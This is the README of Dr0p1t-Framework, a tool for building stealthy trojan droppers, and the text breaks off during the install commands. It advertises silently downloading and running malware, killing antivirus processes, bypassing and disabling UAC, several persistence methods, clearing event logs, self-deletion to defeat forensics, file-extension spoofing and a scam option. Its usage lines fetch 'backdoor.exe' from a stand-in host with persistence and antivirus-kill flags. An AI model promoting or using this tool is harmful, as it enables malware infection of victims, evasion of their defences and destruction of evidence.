Not maintained currently (Wait for the next version)
Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)
+ Generated executable properties:
- The executable size is smaller compared to other droppers generated the same way.
- Download executable on target system and execute it silently..
- Self destruct function so that the dropper will kill and delete itself after finishing it work
- Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion
- Clear event log after finishing.
+ Framework properties:
- Works with Windows, Linux and now have OSX support ( Thanks to @sm4sh3r )
- Dr0p1t-Server feature (beta) so now you can work from browser See how to work with Dr0p1t-Server
- Dr0p1t-Server have a scam option (beta) See how to work with Dr0p1t-Server
- Find and kill antivirus before running the malware.
- The ability to disable UAC.
- The ability to run your malware as admin.
- Full spoof by spoofing the file icon and extension to any thing you want.
- ZIP files support so now you can compress your executable to zip file before uploading.
- Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
- In running powershell scripts it can bypass execution policy
- Using UPX to compress the dropper after creating it
- Adding executable after downloading it to startup.
- Adding executable after downloading it to task scheduler ( UAC not matters ).
- Adding your file to powershell user profile so your file will be downloaded and ran every time powershell.exe run if it doesn't exist.
On Linux (Kali linux)
Still not fully tested! Need some contributors and testers
Usage: Dr0p1t.py Malware_Url [Options] options: -h, --help show this help message and exit -s Add your malware to startup (Persistence) -t Add your malware to task scheduler (Persistence) -a Add your link to powershell user profile (Persistence) -k Kill antivirus process before running your malware. -b Run this batch script before running your malware. Check scripts folder -p Run this powershell script before running your malware. Check scripts folder -v Run this vbs script before running your malware. Check scripts folder --runas Bypass UAC and run your malware as admin --spoof Spoof the final file to an extension you choose. --zip Tell Dr0p1t that the malware in the link is compressed as zip --upx Use UPX to compress the final file. --nouac Try to disable UAC on victim device -i Use icon to the final file. Check icons folder. --noclearevent Tell the framework to not clear the event logs on target machine after finish. --nocompile Tell the framework to not compile the final file. --only32 Download your malware for 32 bit devices only --only64 Download your malware for 64 bit devices only -q Stay quite ( no banner ) -u Check for updates -nd Display less output information
./Dr0p1t.py Malware_Url [Options] ./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx ./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32 ./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas ./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
- Python 2 or Python 3.
The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller
Needed dependencies for Linux
- Others will be installed from install.sh file
Note : You must have root access
Needed dependencies for windows
- Modules in windows_requirements.txt
There's a list here for all official videos for installing and using Dr0p1t Playlist
- On Linux
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git chmod 777 -R Dr0p1t-Framework c